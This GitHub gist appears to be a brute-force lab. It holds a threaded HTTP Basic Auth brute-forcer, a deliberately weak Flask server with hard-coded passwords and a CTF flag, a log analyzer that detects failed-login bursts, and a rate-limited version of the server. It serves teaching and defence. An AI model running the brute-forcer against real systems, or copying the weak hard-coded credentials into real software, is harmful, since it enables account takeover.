Skip to content

Instantly share code, notes, and snippets.

@Prosen-Ghosh
Last active November 4, 2025 14:04
Show Gist options
  • Select an option

  • Save Prosen-Ghosh/71165df671c0b3f0e82c80c853333015 to your computer and use it in GitHub Desktop.

Select an option

Save Prosen-Ghosh/71165df671c0b3f0e82c80c853333015 to your computer and use it in GitHub Desktop.
import os
import requests
from requests.auth import HTTPBasicAuth
import argparse
import sys
from concurrent.futures import ThreadPoolExecutor, as_completed
from time import sleep
import logging
# Turn off urllib3's warnings through the urllib3 module that requests exposes.
requests.packages.urllib3.disable_warnings()

# Root logger: INFO and above, each record prefixed with timestamp and level.
logging.basicConfig(
    format='%(asctime)s - %(levelname)s - %(message)s',
    level=logging.INFO,
)
class BasicAuthBruteForcer:
    """Try every username/password pair against an HTTP Basic Auth endpoint.

    Both wordlists are read in the constructor. ``run`` submits one GET
    request per pair to a thread pool and collects the pairs that the target
    answers with HTTP 200.
    """

    def __init__(self, target_url, users_file, passwords_file, threads=5, delay=0):
        """Store the settings and load both wordlists.

        Args:
            target_url: URL requested for every attempt.
            users_file: Path to a file with one username per line.
            passwords_file: Path to a file with one password per line.
            threads: Worker count handed to ``ThreadPoolExecutor``.
            delay: Seconds to sleep after submitting each attempt; values
                that are not greater than zero disable the pause.

        Raises:
            FileNotFoundError: A wordlist path does not exist.
            ValueError: A wordlist is not a file or has no entries.
            PermissionError: A wordlist is not readable.
        """
        self.target_url = target_url
        self.threads = threads
        self.delay = delay
        self.found_credentials = []
        self.users = self.load_file(users_file)
        self.passwords = self.load_file(passwords_file)

    def load_file(self, filepath):
        """Return the non-blank lines of *filepath*, stripped of whitespace.

        Raises:
            FileNotFoundError: The path does not exist.
            ValueError: The path is not a file, is zero bytes long, or holds
                only blank lines.
            PermissionError: The file is not readable.
            SystemExit: Reading failed for any other reason (logged first).
        """
        if not os.path.exists(filepath):
            raise FileNotFoundError(f"File '{filepath}' does not exist")
        if not os.path.isfile(filepath):
            raise ValueError(f"'{filepath}' is not a file")
        file_size = os.path.getsize(filepath)
        if file_size == 0:
            raise ValueError(f"File '{filepath}' is empty")
        if not os.access(filepath, os.R_OK):
            raise PermissionError(f"No read permission for '{filepath}'")
        try:
            with open(filepath, 'r') as f:
                stripped = (line.strip() for line in f)
                entries = [entry for entry in stripped if entry]
        except Exception as e:
            logging.error(f"Error loading file {filepath}: {e}")
            sys.exit(1)
        # A file made only of blank lines passes the size check above but
        # would otherwise produce a silent run with zero attempts.
        if not entries:
            raise ValueError(f"File '{filepath}' contains no entries")
        return entries

    def try_credentials(self, username, password):
        """Send one authenticated GET and record the pair on HTTP 200.

        Returns:
            True when the response status is 200 (the pair is also appended
            to ``found_credentials``); False for any other status or when
            requests raises a ``RequestException``.
        """
        try:
            response = requests.get(
                self.target_url,
                auth=HTTPBasicAuth(username, password),
                timeout=5,
            )
            if response.status_code == 200:
                logging.info(f'[SUCCESS] {username}:{password}')
                self.found_credentials.append((username, password))
                return True
            else:
                logging.debug(f'[FAILURE] {username}:{password} - Status Code: {response.status_code}')
                return False
        except requests.exceptions.RequestException as e:
            logging.error(f"Request error for {username}:{password} - {e}")
            return False

    def run(self):
        """Attempt every user/password combination and report the hits.

        Returns:
            The ``found_credentials`` list of ``(username, password)`` tuples.
        """
        total_attempts = len(self.users) * len(self.passwords)
        logging.info(f'Starting brute-force attack on {self.target_url} with {total_attempts} attempts.')
        attempts = 0
        with ThreadPoolExecutor(max_workers=self.threads) as executor:
            # Map each future back to its pair so failures can be attributed.
            pending = {}
            for user in self.users:
                print(f"[INFO] Trying user: {user}")
                for password in self.passwords:
                    future = executor.submit(self.try_credentials, user, password)
                    pending[future] = (user, password)
                    if self.delay > 0:
                        sleep(self.delay)
            for future in as_completed(pending):
                attempts += 1
                # try_credentials only handles requests' own exceptions; any
                # other error (for example one raised while the auth header
                # is being built) would otherwise disappear inside the future.
                error = future.exception()
                if error is not None:
                    user, password = pending[future]
                    logging.error(f"Unexpected error for {user}:{password} - {error}")
                # Also report the last attempt so the log ends on the total.
                if attempts % 10 == 0 or attempts == total_attempts:
                    logging.info(f'Progress: {attempts}/{total_attempts} attempts made.')
        logging.info(f"\n{'=' *100}")
        logging.info(f"Brute-force attack completed: {len(self.found_credentials)} valid credentials found.")
        if self.found_credentials:
            logging.info("\nValid credentials:")
            for user, pwd in self.found_credentials:
                logging.info(f' - {user}:{pwd}')
        return self.found_credentials
def main(argv=None):
    """Parse command-line options and run one brute-force session.

    Args:
        argv: Argument list to parse; ``None`` makes argparse read
            ``sys.argv[1:]``.

    Exits with status 2 (via argparse) on invalid options and with status 1
    when a wordlist cannot be loaded.
    """
    parser = argparse.ArgumentParser(description='HTTP Basic Auth Brute-Forcer')
    parser.add_argument('-u', '--url', required=True, help='Target URL')
    parser.add_argument('-U', '--users', required=True, help='Users wordlist file')
    parser.add_argument('-P', '--passwords', required=True, help='Passwords wordlist file')
    parser.add_argument('-t', '--threads', type=int, default=5, help='Number of threads')
    parser.add_argument('-d', '--delay', type=float, default=0, help='Delay between requests (seconds)')
    args = parser.parse_args(argv)

    # ThreadPoolExecutor rejects a worker count below 1; fail here with a
    # usage message instead of a traceback after the wordlists are loaded.
    if args.threads < 1:
        parser.error('--threads must be at least 1')

    try:
        bruteforcer = BasicAuthBruteForcer(
            args.url,
            args.users,
            args.passwords,
            args.threads,
            args.delay,
        )
    except (OSError, ValueError) as e:
        # Missing, unreadable or empty wordlists: report and stop cleanly.
        logging.error(f'Cannot load wordlists: {e}')
        sys.exit(1)
    bruteforcer.run()
# Run the command-line interface only when executed as a script.
if __name__ == "__main__":
    main()
import re
from collections import defaultdict
from datetime import datetime, timedelta
def analyze_auth_log(log_file, threshold=10, time_window=60):
    """Scan an auth log for bursts of failed logins coming from one IP.

    A line counts as a failure when it contains
    ``AUTH_FAILURE|<ip>|<username>|<timestamp>`` with an ISO 8601 timestamp.
    The IP is the first field and the timestamp the last; everything in
    between is the username, so empty usernames and usernames containing
    ``|`` are still counted.

    Args:
        log_file: Path of the log file to read.
        threshold: Minimum number of failures inside one window that
            triggers an alert.
        time_window: Window length in seconds, measured from a failure.

    Returns:
        A list with at most one dict per IP (the earliest window reaching the
        threshold), with keys ``ip``, ``failure_count``, ``time_start``,
        ``time_end`` and ``usernames_tried`` (a set).
    """
    marker = 'AUTH_FAILURE|'
    failures = defaultdict(list)
    print(f"[*] Analyzing log file: {log_file}")
    print(f"[*] Threshold: {threshold} failures within {time_window} seconds\n")

    # errors='replace': usernames are client-controlled, so a stray
    # undecodable byte must not abort the whole scan.
    with open(log_file, 'r', errors='replace') as f:
        for line in f:
            _, found, payload = line.partition(marker)
            if not found:
                continue
            ip, ip_sep, rest = payload.strip().partition('|')
            # Split the timestamp off from the right so '|' inside the
            # username cannot shift the fields.
            username, ts_sep, timestamp_str = rest.rpartition('|')
            if not (ip and ip_sep and ts_sep and timestamp_str):
                continue
            try:
                timestamp = datetime.fromisoformat(timestamp_str)
            except ValueError:
                print(f"[!] Invalid timestamp format: {timestamp_str}")
                continue
            failures[ip].append((timestamp, username))

    window = timedelta(seconds=time_window)
    alerts = []
    for ip, events in failures.items():
        events.sort(key=lambda event: event[0])
        # Two-pointer sweep: `hi` only moves forward, so each IP is scanned
        # once instead of once per candidate window start.
        hi = 0
        for lo, (window_start, _) in enumerate(events):
            window_end = window_start + window
            hi = max(hi, lo)  # only matters for a negative time_window
            while hi < len(events) and events[hi][0] <= window_end:
                hi += 1
            if hi - lo >= threshold:
                alerts.append({
                    'ip': ip,
                    'failure_count': hi - lo,
                    'time_start': window_start,
                    'time_end': window_end,
                    'usernames_tried': {name for _, name in events[lo:hi]},
                })
                break  # one alert per IP

    if alerts:
        print(f"[!] ALERT: {len(alerts)} potential brute-force attacks detected:\n")
        for alert in alerts:
            print(f"[!] IP: {alert['ip']}")
            print(f" Failures: {alert['failure_count']}")
            print(f" Time window: {alert['time_start']} to {alert['time_end']}")
            # Sorted so the report is stable between runs.
            print(f" Usernames tried: {', '.join(sorted(alert['usernames_tried']))}")
            print()
    else:
        print("[*] No brute-force attacks detected.")
    return alerts
if __name__ == '__main__':
    import sys

    # The first positional argument is the log path; extras are ignored.
    if len(sys.argv) >= 2:
        log_file = sys.argv[1]
        analyze_auth_log(log_file)
    else:
        print("[!] Usage: python detect_bruteforce.py <log_file>")
        sys.exit(1)
#!/usr/bin/env python3
from flask import Flask, request, jsonify, Response
import logging
from datetime import datetime
# Flask application object that the route decorators register against.
app = Flask(__name__)

# Root logger writes INFO and above to the auth log file, each record
# prefixed with the logging timestamp.
logging.basicConfig(
    format='%(asctime)s - %(message)s',
    level=logging.INFO,
    filename='/var/log/auth.log',
)
# Hard-coded accounts: username -> plaintext password.
VALID_USERS = {
    'admin': 'admin123',
    'user': 'password',
    'test': 'test123',
    'root': '123456',
}


def check_auth(username, password):
    """Return True only when *username* exists and *password* matches it.

    Args:
        username: Username supplied by the client; may be ``None``.
        password: Password supplied by the client; may be ``None``.

    Returns:
        ``True`` for a known user with the matching password, else ``False``.
    """
    import hmac  # local import keeps this block self-contained

    # Reject missing values explicitly: comparing `VALID_USERS.get(username)`
    # with `password` directly is True when both are None, which would accept
    # a request that carries no usable credentials at all.
    if not isinstance(username, str) or not isinstance(password, str):
        return False
    expected = VALID_USERS.get(username)
    if expected is None:
        return False
    # Compare as bytes: compare_digest rejects non-ASCII str arguments.
    return hmac.compare_digest(password.encode('utf-8'), expected.encode('utf-8'))
def authenticate():
    """Build the 401 response that asks the client for Basic credentials."""
    challenge = {'WWW-Authenticate': 'Basic realm="Login Required"'}
    return Response('Authentication required', status=401, headers=challenge)
def _log_safe(value):
    """Return *value* as text with CR and LF escaped.

    Keeps a client-supplied value on a single log line so it cannot start a
    forged record.
    """
    return str(value).replace('\r', '\\r').replace('\n', '\\n')


@app.route('/api/protected', methods=['GET'])
def protected_resource():
    """Serve the protected payload to clients with valid Basic credentials.

    Every request that carries credentials is logged as ``AUTH_ATTEMPT`` and
    then as ``AUTH_FAILURE`` or ``AUTH_SUCCESS``; each record has the form
    ``<EVENT>|<remote address>|<username>|<ISO timestamp>``.

    Returns:
        The JSON payload on success, otherwise the 401 challenge from
        ``authenticate()``.
    """
    auth = request.authorization
    if not auth:
        # No credentials at all: challenge without logging an attempt.
        return authenticate()

    client = request.remote_addr
    # The username is decoded from the client's header and may contain line
    # breaks; escape them before it reaches the log file.
    username = _log_safe(auth.username)
    logging.info(f'AUTH_ATTEMPT|{client}|{username}|{datetime.now().isoformat()}')

    if not check_auth(auth.username, auth.password):
        logging.info(f'AUTH_FAILURE|{client}|{username}|{datetime.now().isoformat()}')
        return authenticate()

    logging.info(f'AUTH_SUCCESS|{client}|{username}|{datetime.now().isoformat()}')
    return jsonify({
        'message': 'Access granted',
        'user': auth.username,
        'secret': 'FLAG{basic_auth_cracked}'
    })
@app.route('/health', methods=['GET'])
def health():
    """Unauthenticated status endpoint; always answers ``{"status": "ok"}``."""
    body = {'status': 'ok'}
    return jsonify(body)
if __name__ == '__main__':
    # Listen on every interface, port 5001, with the Flask debugger off.
    app.run(host='0.0.0.0', port=5001, debug=False)
#!/usr/bin/env python3
from flask import Flask, request, jsonify, Response
import logging
from datetime import datetime
from flask_limiter import Limiter
from flask_limiter.util import get_remote_address
# Flask application object that the route decorators register against.
app = Flask(__name__)

# Rate limiter keyed on the client's remote address, with in-memory counters
# and default limits applied through the app.
limiter = Limiter(
    key_func=get_remote_address,
    app=app,
    storage_uri="memory://",
    default_limits=["200 per day", "50 per hour"],
)

# Root logger writes INFO and above to the auth log file, each record
# prefixed with the logging timestamp.
logging.basicConfig(
    format='%(asctime)s - %(message)s',
    level=logging.INFO,
    filename='/var/log/auth.log',
)
# Hard-coded accounts: username -> plaintext password.
VALID_USERS = {
    'admin': 'admin123',
    'user': 'password',
    'test': 'test123',
    'root': '123456',
}


def check_auth(username, password):
    """Return True only when *username* exists and *password* matches it.

    Args:
        username: Username supplied by the client; may be ``None``.
        password: Password supplied by the client; may be ``None``.

    Returns:
        ``True`` for a known user with the matching password, else ``False``.
    """
    import hmac  # local import keeps this block self-contained

    # Reject missing values explicitly: comparing `VALID_USERS.get(username)`
    # with `password` directly is True when both are None, which would accept
    # a request that carries no usable credentials at all.
    if not isinstance(username, str) or not isinstance(password, str):
        return False
    expected = VALID_USERS.get(username)
    if expected is None:
        return False
    # Compare as bytes: compare_digest rejects non-ASCII str arguments.
    return hmac.compare_digest(password.encode('utf-8'), expected.encode('utf-8'))
def authenticate():
    """Build the 401 response that asks the client for Basic credentials."""
    challenge = {'WWW-Authenticate': 'Basic realm="Login Required"'}
    return Response('Authentication required', status=401, headers=challenge)
def _log_safe(value):
    """Return *value* as text with CR and LF escaped.

    Keeps a client-supplied value on a single log line so it cannot start a
    forged record.
    """
    return str(value).replace('\r', '\\r').replace('\n', '\\n')


@app.route('/api/protected', methods=['GET'])
@limiter.limit("10 per minute")
def protected_resource():
    """Serve the protected payload to clients with valid Basic credentials.

    The route is limited to 10 requests per minute per limiter key. Every
    request that carries credentials is logged as ``AUTH_ATTEMPT`` and then
    as ``AUTH_FAILURE`` or ``AUTH_SUCCESS``; each record has the form
    ``<EVENT>|<remote address>|<username>|<ISO timestamp>``.

    Returns:
        The JSON payload on success, otherwise the 401 challenge from
        ``authenticate()``.
    """
    auth = request.authorization
    if not auth:
        # No credentials at all: challenge without logging an attempt.
        return authenticate()

    client = request.remote_addr
    # The username is decoded from the client's header and may contain line
    # breaks; escape them before it reaches the log file.
    username = _log_safe(auth.username)
    logging.info(f'AUTH_ATTEMPT|{client}|{username}|{datetime.now().isoformat()}')

    if not check_auth(auth.username, auth.password):
        logging.info(f'AUTH_FAILURE|{client}|{username}|{datetime.now().isoformat()}')
        return authenticate()

    logging.info(f'AUTH_SUCCESS|{client}|{username}|{datetime.now().isoformat()}')
    return jsonify({
        'message': 'Access granted',
        'user': auth.username,
        'secret': 'FLAG{basic_auth_cracked}'
    })
@app.route('/health', methods=['GET'])
def health():
    """Unauthenticated status endpoint; always answers ``{"status": "ok"}``."""
    body = {'status': 'ok'}
    return jsonify(body)
if __name__ == '__main__':
    # Listen on every interface, port 5001, with the Flask debugger off.
    app.run(host='0.0.0.0', port=5001, debug=False)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment